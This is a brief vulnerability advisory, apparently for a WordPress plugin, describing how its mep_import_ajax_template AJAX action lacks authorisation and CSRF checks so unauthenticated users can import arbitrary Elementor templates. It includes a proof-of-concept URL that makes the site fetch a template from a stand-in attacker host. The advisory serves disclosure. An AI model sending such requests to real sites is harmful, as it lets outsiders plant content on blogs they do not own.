The mep_import_ajax_template AJAX action of the plugin, available to both unauthenticated and authenticated users, is lacking any authorisation and CSRF checks. As a result, unauthenticated user can import arbitrary Elementor template to the blog
Legit template: https://example.com/wp-admin/admin-ajax.php?action=mep_import_ajax_template&file=https%3A%2F%2Fvaincode.com%2Fupdate%2Ftemplate%2Fjson%2Fpadma.json&editor=elm&name=Elementor+Template+-+Padma Attacker one: https://example.com/wp-admin/admin-ajax.php?action=mep_import_ajax_template&editor=elm&name=attacker&file=https://attacker.com/template.json
2021-11-03 (about 1 years ago)
2021-11-03 (about 1 years ago)
2021-11-03 (about 1 years ago)